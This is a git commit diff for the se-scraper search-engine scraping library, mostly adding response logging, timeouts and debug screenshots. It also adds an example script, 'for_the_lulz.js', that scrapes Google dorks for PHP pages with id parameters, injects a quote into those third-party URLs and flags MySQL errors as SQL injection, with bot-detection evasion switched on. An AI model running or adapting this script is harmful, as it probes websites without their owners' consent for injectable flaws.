forked from extern/se-scraper
worked on issue #31
This commit is contained in:
parent
80d23a9d57
commit
0d7f6dcd11
@ -188,6 +188,7 @@ You can define your own scraper class and use it within se-scraper.
|
|||||||
* [Scrape 100 keywords on Bing with multible tabs in one browser](examples/multiple_tabs.js) produces [this](examples/results/bing.json)
|
* [Scrape 100 keywords on Bing with multible tabs in one browser](examples/multiple_tabs.js) produces [this](examples/results/bing.json)
|
||||||
* [Scrape two keywords on Amazon](examples/amazon.js) produces [this](examples/results/amazon.json)
|
* [Scrape two keywords on Amazon](examples/amazon.js) produces [this](examples/results/amazon.json)
|
||||||
* [Inject your own scraping logic](examples/pluggable.js)
|
* [Inject your own scraping logic](examples/pluggable.js)
|
||||||
|
* [For the Lulz: Scraping google dorks for SQL injection vulnerabilites and confirming them.](examples/for_the_lulz.js)
|
||||||
|
|
||||||
|
|
||||||
## Scraping Model
|
## Scraping Model
|
||||||
|
2
TODO.md
2
TODO.md
@ -51,3 +51,5 @@
|
|||||||
### TODO:
|
### TODO:
|
||||||
1. fix googlenewsscraper waiting for results and parsing. remove the static sleep [done]
|
1. fix googlenewsscraper waiting for results and parsing. remove the static sleep [done]
|
||||||
2. when using multiple browsers and random user agent, pass a random user agent to each perBrowserOptions
|
2. when using multiple browsers and random user agent, pass a random user agent to each perBrowserOptions
|
||||||
|
|
||||||
|
3. dont create a new tab when opening a new scraper
|
||||||
|
Binary file not shown.
After Width: | Height: | Size: 74 KiB |
4645
examples/bing_de.json
Normal file
4645
examples/bing_de.json
Normal file
File diff suppressed because it is too large
Load Diff
91
examples/bing_multiple_browser_multiple_pages.js
Normal file
91
examples/bing_multiple_browser_multiple_pages.js
Normal file
@ -0,0 +1,91 @@
|
|||||||
|
var fs = require('fs');
|
||||||
|
var path = require('path');
|
||||||
|
var os = require("os");
|
||||||
|
|
||||||
|
const se_scraper = require('./../index.js');
|
||||||
|
var filepath_de = path.join(__dirname, '/data/keywords_de.txt');
|
||||||
|
|
||||||
|
function read_keywords_from_file(fpath) {
|
||||||
|
let kws = fs.readFileSync(fpath).toString().split(os.EOL);
|
||||||
|
// clean keywords
|
||||||
|
kws = kws.filter((kw) => {
|
||||||
|
return kw.trim().length > 0;
|
||||||
|
});
|
||||||
|
return kws;
|
||||||
|
}
|
||||||
|
|
||||||
|
let keywords_de = read_keywords_from_file(filepath_de);
|
||||||
|
|
||||||
|
const Cluster = {
|
||||||
|
CONCURRENCY_PAGE: 1, // shares cookies, etc.
|
||||||
|
CONCURRENCY_CONTEXT: 2, // no cookie sharing (uses contexts)
|
||||||
|
CONCURRENCY_BROWSER: 3, // no cookie sharing and individual processes (uses contexts)
|
||||||
|
};
|
||||||
|
|
||||||
|
// those options need to be provided on startup
|
||||||
|
// and cannot give to se-scraper on scrape() calls
|
||||||
|
let browser_config = {
|
||||||
|
// the user agent to scrape with
|
||||||
|
user_agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
|
||||||
|
// if random_user_agent is set to True, a random user agent is chosen
|
||||||
|
random_user_agent: true,
|
||||||
|
verbose: true,
|
||||||
|
// whether to start the browser in headless mode
|
||||||
|
headless: true,
|
||||||
|
// whether debug information should be printed
|
||||||
|
// level 0: print nothing
|
||||||
|
// level 1: print most important info
|
||||||
|
// ...
|
||||||
|
// level 4: print all shit nobody wants to know
|
||||||
|
debug_level: 1,
|
||||||
|
is_local: false,
|
||||||
|
throw_on_detection: false,
|
||||||
|
puppeteer_cluster_config: {
|
||||||
|
headless: true,
|
||||||
|
timeout: 2 * 60 * 1000, // max timeout set to 2 minutes
|
||||||
|
monitor: false,
|
||||||
|
concurrency: 3, // one scraper per tab
|
||||||
|
maxConcurrency: 3, // scrape with 5 tabs
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
(async () => {
|
||||||
|
// scrape config can change on each scrape() call
|
||||||
|
let scrape_config_bing_de = {
|
||||||
|
// which search engine to scrape
|
||||||
|
search_engine: 'bing',
|
||||||
|
// an array of keywords to scrape
|
||||||
|
keywords: keywords_de,
|
||||||
|
// the number of pages to scrape for each keyword
|
||||||
|
num_pages: 10,
|
||||||
|
|
||||||
|
// OPTIONAL PARAMS BELOW:
|
||||||
|
// https://docs.microsoft.com/en-us/rest/api/cognitiveservices-bingsearch/bing-web-api-v5-reference#query-parameters
|
||||||
|
bing_settings: {
|
||||||
|
cc: 'DE', // The cc parameter determines the country to use for the query.
|
||||||
|
mkt: 'de-DE', // The mkt parameter determines the UI language to return results.
|
||||||
|
offset: 0, // Determines the results offset to use, defaults to 0.
|
||||||
|
count: 20, // Determines the number of results to show, defaults to 10. Maximum is 100.
|
||||||
|
},
|
||||||
|
// how long to sleep between requests. a random sleep interval within the range [a,b]
|
||||||
|
// is drawn before every request. empty string for no sleeping.
|
||||||
|
sleep_range: '',
|
||||||
|
// path to output file, data will be stored in JSON
|
||||||
|
output_file: 'examples/bing_de.json',
|
||||||
|
// whether to prevent images, css, fonts from being loaded
|
||||||
|
// will speed up scraping a great deal
|
||||||
|
block_assets: true,
|
||||||
|
// check if headless chrome escapes common detection techniques
|
||||||
|
// this is a quick test and should be used for debugging
|
||||||
|
test_evasion: false,
|
||||||
|
apply_evasion_techniques: true,
|
||||||
|
// log ip address data
|
||||||
|
log_ip_address: false,
|
||||||
|
// log http headers
|
||||||
|
log_http_headers: false,
|
||||||
|
};
|
||||||
|
|
||||||
|
let results = await se_scraper.scrape(browser_config, scrape_config_bing_de);
|
||||||
|
console.dir(results.metadata, {depth: null, colors: true});
|
||||||
|
|
||||||
|
})();
|
6
examples/data/keywords_de.txt
Normal file
6
examples/data/keywords_de.txt
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
filetype:pdf anleitung
|
||||||
|
filetype:pdf berge
|
||||||
|
filetype:pdf iso 27001
|
||||||
|
filetype:pdf pruefugn
|
||||||
|
filetype:pdf klima
|
||||||
|
filetype:pdf archiv news
|
100
examples/for_the_lulz.js
Normal file
100
examples/for_the_lulz.js
Normal file
@ -0,0 +1,100 @@
|
|||||||
|
|
||||||
|
/*
|
||||||
|
* Do not run this, this is probably illegal in your country ;)
|
||||||
|
*/
|
||||||
|
|
||||||
|
const se_scraper = require('./../index.js');
|
||||||
|
|
||||||
|
|
||||||
|
// generate some google dorks
|
||||||
|
|
||||||
|
let lulz_keywords = [];
|
||||||
|
|
||||||
|
['seite', 'inicio', 'index'].forEach((x) => {
|
||||||
|
for (var i = 0; i < 2; i++) {
|
||||||
|
lulz_keywords.push(
|
||||||
|
'inurl:"' + x + '.php?id=' + Math.floor(Math.random() * 100) + '"'
|
||||||
|
)
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
console.log(lulz_keywords);
|
||||||
|
|
||||||
|
|
||||||
|
// those options need to be provided on startup
|
||||||
|
// and cannot give to se-scraper on scrape() calls
|
||||||
|
let browser_config = {
|
||||||
|
// if random_user_agent is set to True, a random user agent is chosen
|
||||||
|
random_user_agent: true,
|
||||||
|
headless: true,
|
||||||
|
// whether debug information should be printed
|
||||||
|
// level 0: print nothing
|
||||||
|
// level 1: print most important info
|
||||||
|
// ...
|
||||||
|
// level 4: print all shit nobody wants to know
|
||||||
|
debug_level: 1,
|
||||||
|
is_local: false,
|
||||||
|
throw_on_detection: false,
|
||||||
|
puppeteer_cluster_config: {
|
||||||
|
headless: true,
|
||||||
|
timeout: 2 * 60 * 1000, // max timeout set to 2 minutes
|
||||||
|
monitor: false,
|
||||||
|
concurrency: 3, // one scraper per tab
|
||||||
|
maxConcurrency: 4, // scrape with 4 tabs
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
(async () => {
|
||||||
|
// scrape config can change on each scrape() call
|
||||||
|
let lulz_config = {
|
||||||
|
// which search engine to scrape
|
||||||
|
search_engine: 'google',
|
||||||
|
// an array of keywords to scrape
|
||||||
|
keywords: lulz_keywords,
|
||||||
|
// the number of pages to scrape for each keyword
|
||||||
|
num_pages: 3,
|
||||||
|
// how long to sleep between requests. a random sleep interval within the range [a,b]
|
||||||
|
// is drawn before every request. empty string for no sleeping.
|
||||||
|
sleep_range: '',
|
||||||
|
// path to output file, data will be stored in JSON
|
||||||
|
output_file: 'goodboys.json',
|
||||||
|
// whether to prevent images, css, fonts from being loaded
|
||||||
|
// will speed up scraping a great deal
|
||||||
|
block_assets: true,
|
||||||
|
// check if headless chrome escapes common detection techniques
|
||||||
|
// this is a quick test and should be used for debugging
|
||||||
|
test_evasion: false,
|
||||||
|
apply_evasion_techniques: true,
|
||||||
|
// log ip address data
|
||||||
|
log_ip_address: false,
|
||||||
|
// log http headers
|
||||||
|
log_http_headers: false,
|
||||||
|
};
|
||||||
|
|
||||||
|
let results = await se_scraper.scrape(browser_config, lulz_config);
|
||||||
|
|
||||||
|
const all_links = [];
|
||||||
|
|
||||||
|
for (var kw in results) {
|
||||||
|
for (var page in results[kw]) {
|
||||||
|
for (var res of results[kw][page]['results']) {
|
||||||
|
all_links.push(res.link);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
console.log(all_links);
|
||||||
|
|
||||||
|
for (var link of all_links) {
|
||||||
|
try {
|
||||||
|
const response = await got(link.replace(/(id=\d+)/g, "$1'"));
|
||||||
|
let html = response.body;
|
||||||
|
if (html.includes('error') || html.includes('mysql')) {
|
||||||
|
console.log('Got a mysql injection in ' + url);
|
||||||
|
}
|
||||||
|
} catch (error) {
|
||||||
|
console.log(error.response.statusCode);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
})();
|
@ -105,7 +105,7 @@ class AmazonScraper extends Scraper {
|
|||||||
console.log('Using startUrl: ' + startUrl);
|
console.log('Using startUrl: ' + startUrl);
|
||||||
}
|
}
|
||||||
|
|
||||||
await this.page.goto(startUrl);
|
this.last_response = await this.page.goto(startUrl);
|
||||||
|
|
||||||
try {
|
try {
|
||||||
await this.page.waitForSelector('input[name="field-keywords"]', { timeout: this.STANDARD_TIMEOUT });
|
await this.page.waitForSelector('input[name="field-keywords"]', { timeout: this.STANDARD_TIMEOUT });
|
||||||
|
@ -39,7 +39,7 @@ class BaiduScraper extends Scraper {
|
|||||||
let startUrl = this.build_start_url('https://www.baidu.com/s?') || 'https://www.baidu.com/';
|
let startUrl = this.build_start_url('https://www.baidu.com/s?') || 'https://www.baidu.com/';
|
||||||
|
|
||||||
try {
|
try {
|
||||||
await this.page.goto(startUrl);
|
this.last_response = await this.page.goto(startUrl);
|
||||||
await this.page.waitForSelector('input[name="wd"]', { timeout: 5000 });
|
await this.page.waitForSelector('input[name="wd"]', { timeout: 5000 });
|
||||||
} catch (e) {
|
} catch (e) {
|
||||||
return false;
|
return false;
|
||||||
|
@ -49,7 +49,7 @@ class BingScraper extends Scraper {
|
|||||||
|
|
||||||
try {
|
try {
|
||||||
await this.page.goto(startUrl);
|
await this.page.goto(startUrl);
|
||||||
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
|
||||||
} catch (e) {
|
} catch (e) {
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
@ -69,14 +69,17 @@ class BingScraper extends Scraper {
|
|||||||
if (!next_page_link) {
|
if (!next_page_link) {
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
await next_page_link.click();
|
|
||||||
await this.page.waitForNavigation();
|
this.last_response = await Promise.all([
|
||||||
|
next_page_link.click(), // The promise resolves after navigation has finished
|
||||||
|
this.page.waitForNavigation(), // Clicking the link will indirectly cause a navigation
|
||||||
|
]);
|
||||||
|
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
|
|
||||||
async wait_for_results() {
|
async wait_for_results() {
|
||||||
await this.page.waitForSelector('#b_content', { timeout: 5000 });
|
await this.page.waitForSelector('#b_content', { timeout: this.STANDARD_TIMEOUT });
|
||||||
}
|
}
|
||||||
|
|
||||||
async detected() {
|
async detected() {
|
||||||
@ -126,7 +129,7 @@ class BingNewsScraper extends Scraper {
|
|||||||
console.log('Sleeping 30 seconds. Set your settings now.');
|
console.log('Sleeping 30 seconds. Set your settings now.');
|
||||||
await this.sleep(30000);
|
await this.sleep(30000);
|
||||||
}
|
}
|
||||||
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
|
||||||
} catch (e) {
|
} catch (e) {
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
@ -147,14 +150,17 @@ class BingNewsScraper extends Scraper {
|
|||||||
if (!next_page_link) {
|
if (!next_page_link) {
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
await next_page_link.click();
|
|
||||||
await this.page.waitForNavigation();
|
this.last_response = await Promise.all([
|
||||||
|
next_page_link.click(), // The promise resolves after navigation has finished
|
||||||
|
this.page.waitForNavigation(), // Clicking the link will indirectly cause a navigation
|
||||||
|
]);
|
||||||
|
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
|
|
||||||
async wait_for_results() {
|
async wait_for_results() {
|
||||||
await this.page.waitForSelector('#news', { timeout: 5000 });
|
await this.page.waitForSelector('#news', { timeout: this.STANDARD_TIMEOUT });
|
||||||
}
|
}
|
||||||
|
|
||||||
async detected() {
|
async detected() {
|
||||||
|
@ -42,7 +42,7 @@ class DuckduckgoScraper extends Scraper {
|
|||||||
let startUrl = this.build_start_url('https://duckduckgo.com/?') || 'https://duckduckgo.com/';
|
let startUrl = this.build_start_url('https://duckduckgo.com/?') || 'https://duckduckgo.com/';
|
||||||
|
|
||||||
try {
|
try {
|
||||||
await this.page.goto(startUrl);
|
this.last_response = await this.page.goto(startUrl);
|
||||||
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
||||||
} catch (e) {
|
} catch (e) {
|
||||||
return false;
|
return false;
|
||||||
@ -116,7 +116,7 @@ class DuckduckgoNewsScraper extends Scraper {
|
|||||||
|
|
||||||
async load_start_page() {
|
async load_start_page() {
|
||||||
try {
|
try {
|
||||||
await this.page.goto('https://duckduckgo.com/?q=42&t=h_&iar=news&ia=news');
|
this.last_response = await this.page.goto('https://duckduckgo.com/?q=42&t=h_&iar=news&ia=news');
|
||||||
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
||||||
} catch (e) {
|
} catch (e) {
|
||||||
console.error(e);
|
console.error(e);
|
||||||
@ -140,7 +140,7 @@ class DuckduckgoNewsScraper extends Scraper {
|
|||||||
}
|
}
|
||||||
await next_page_link.click();
|
await next_page_link.click();
|
||||||
try {
|
try {
|
||||||
await this.page.waitForNavigation({timeout: 5000});
|
this.last_response = await this.page.waitForNavigation({timeout: 5000});
|
||||||
} catch(e) {
|
} catch(e) {
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
|
@ -75,7 +75,7 @@ class GoogleScraper extends Scraper {
|
|||||||
|
|
||||||
log(this.config, 1, 'Using startUrl: ' + startUrl);
|
log(this.config, 1, 'Using startUrl: ' + startUrl);
|
||||||
|
|
||||||
await this.page.goto(startUrl);
|
this.last_response = await this.page.goto(startUrl);
|
||||||
|
|
||||||
try {
|
try {
|
||||||
await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
|
await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
|
||||||
@ -175,7 +175,7 @@ class GoogleNewsOldScraper extends Scraper {
|
|||||||
let url = this.build_start_url(`https://www.google.com/search?q=${keyword}&source=lnms&tbm=nws&`) ||
|
let url = this.build_start_url(`https://www.google.com/search?q=${keyword}&source=lnms&tbm=nws&`) ||
|
||||||
`https://www.google.com/search?q=${keyword}&hl=en&source=lnms&tbm=nws`;
|
`https://www.google.com/search?q=${keyword}&hl=en&source=lnms&tbm=nws`;
|
||||||
|
|
||||||
await this.page.goto(url, {
|
this.last_response = await this.page.goto(url, {
|
||||||
referer: 'https://www.google.com/'
|
referer: 'https://www.google.com/'
|
||||||
});
|
});
|
||||||
|
|
||||||
@ -252,7 +252,7 @@ class GoogleImageScraper extends Scraper {
|
|||||||
|
|
||||||
async load_start_page() {
|
async load_start_page() {
|
||||||
try {
|
try {
|
||||||
await this.page.goto(`https://www.google.com/imghp?tbm=isch`, {
|
this.last_response = await this.page.goto(`https://www.google.com/imghp?tbm=isch`, {
|
||||||
referer: 'https://www.google.com/'
|
referer: 'https://www.google.com/'
|
||||||
});
|
});
|
||||||
await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
|
await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
|
||||||
@ -269,7 +269,7 @@ class GoogleImageScraper extends Scraper {
|
|||||||
await input.focus();
|
await input.focus();
|
||||||
await this.page.keyboard.press("Enter");
|
await this.page.keyboard.press("Enter");
|
||||||
// this waitForNavigation makes hardcoded sleeps not necessary
|
// this waitForNavigation makes hardcoded sleeps not necessary
|
||||||
await this.page.waitForNavigation();
|
this.last_response = await this.page.waitForNavigation();
|
||||||
}
|
}
|
||||||
|
|
||||||
async next_page() {
|
async next_page() {
|
||||||
@ -349,7 +349,7 @@ class GoogleNewsScraper extends Scraper {
|
|||||||
async load_start_page() {
|
async load_start_page() {
|
||||||
try {
|
try {
|
||||||
this.all_results = new Set();
|
this.all_results = new Set();
|
||||||
await this.page.goto(`https://news.google.com/?hl=en-US&gl=US&ceid=US:en`, {
|
this.last_response = await this.page.goto(`https://news.google.com/?hl=en-US&gl=US&ceid=US:en`, {
|
||||||
referer: 'https://news.google.com'
|
referer: 'https://news.google.com'
|
||||||
});
|
});
|
||||||
|
|
||||||
|
@ -45,7 +45,7 @@ class InfospaceScraper extends Scraper {
|
|||||||
let startUrl = this.build_start_url('http://search.infospace.com/search/web?') || 'http://infospace.com/index.html';
|
let startUrl = this.build_start_url('http://search.infospace.com/search/web?') || 'http://infospace.com/index.html';
|
||||||
|
|
||||||
try {
|
try {
|
||||||
await this.page.goto(startUrl);
|
this.last_response = await this.page.goto(startUrl);
|
||||||
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
||||||
} catch (e) {
|
} catch (e) {
|
||||||
return false;
|
return false;
|
||||||
@ -67,7 +67,7 @@ class InfospaceScraper extends Scraper {
|
|||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
await next_page_link.click();
|
await next_page_link.click();
|
||||||
await this.page.waitForNavigation();
|
this.last_response = await this.page.waitForNavigation();
|
||||||
|
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
@ -117,7 +117,7 @@ class WebcrawlerNewsScraper extends Scraper {
|
|||||||
|
|
||||||
async load_start_page() {
|
async load_start_page() {
|
||||||
try {
|
try {
|
||||||
await this.page.goto('https://www.webcrawler.com/?qc=news');
|
this.last_response = await this.page.goto('https://www.webcrawler.com/?qc=news');
|
||||||
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
|
||||||
} catch (e) {
|
} catch (e) {
|
||||||
return false;
|
return false;
|
||||||
|
@ -19,6 +19,7 @@ module.exports = class Scraper {
|
|||||||
} = options;
|
} = options;
|
||||||
|
|
||||||
this.page = page;
|
this.page = page;
|
||||||
|
this.last_response = null; // the last response object
|
||||||
this.metadata = {};
|
this.metadata = {};
|
||||||
this.pluggable = pluggable;
|
this.pluggable = pluggable;
|
||||||
this.config = config;
|
this.config = config;
|
||||||
@ -212,6 +213,16 @@ module.exports = class Scraper {
|
|||||||
|
|
||||||
console.error(`Problem with scraping ${keyword} in search engine ${this.config.search_engine_name}: ${e}`);
|
console.error(`Problem with scraping ${keyword} in search engine ${this.config.search_engine_name}: ${e}`);
|
||||||
|
|
||||||
|
if (this.last_response) {
|
||||||
|
log(this.config, 2, this.last_response);
|
||||||
|
}
|
||||||
|
|
||||||
|
try {
|
||||||
|
// Try to save a screenshot of the error
|
||||||
|
await this.page.screenshot({path: `debug_se_scraper_${this.config.search_engine_name}_${keyword}.png`});
|
||||||
|
} catch (e) {
|
||||||
|
}
|
||||||
|
|
||||||
if (await this.detected() === true) {
|
if (await this.detected() === true) {
|
||||||
console.error(`${this.config.search_engine_name} detected the scraping!`);
|
console.error(`${this.config.search_engine_name} detected the scraping!`);
|
||||||
|
|
||||||
|
@ -56,7 +56,7 @@ class YoutubeScraper extends Scraper {
|
|||||||
async load_start_page() {
|
async load_start_page() {
|
||||||
try {
|
try {
|
||||||
this.all_videos = new Set();
|
this.all_videos = new Set();
|
||||||
await this.page.goto('https://www.youtube.com', {
|
this.last_response = await this.page.goto('https://www.youtube.com', {
|
||||||
referer: 'https://google.com'
|
referer: 'https://google.com'
|
||||||
});
|
});
|
||||||
await this.page.waitForSelector('input[id="search"]', { timeout: 5000 });
|
await this.page.waitForSelector('input[id="search"]', { timeout: 5000 });
|
||||||
|
@ -375,7 +375,7 @@ class ScrapeManager {
|
|||||||
if (this.config.use_proxies_only) {
|
if (this.config.use_proxies_only) {
|
||||||
this.config.proxy = this.config.proxies[c]; // every cluster has a dedicated proxy
|
this.config.proxy = this.config.proxies[c]; // every cluster has a dedicated proxy
|
||||||
} else if(c > 0) {
|
} else if(c > 0) {
|
||||||
this.config.proxy = this.config.proxies[c - 1]; // first cluster uses own ip address
|
this.config.proxy = this.config.proxies[c-1]; // first cluster uses own ip address
|
||||||
}
|
}
|
||||||
|
|
||||||
var obj = getScraper(this.config.search_engine, {
|
var obj = getScraper(this.config.search_engine, {
|
||||||
|
Loading…
Reference in New Issue
Block a user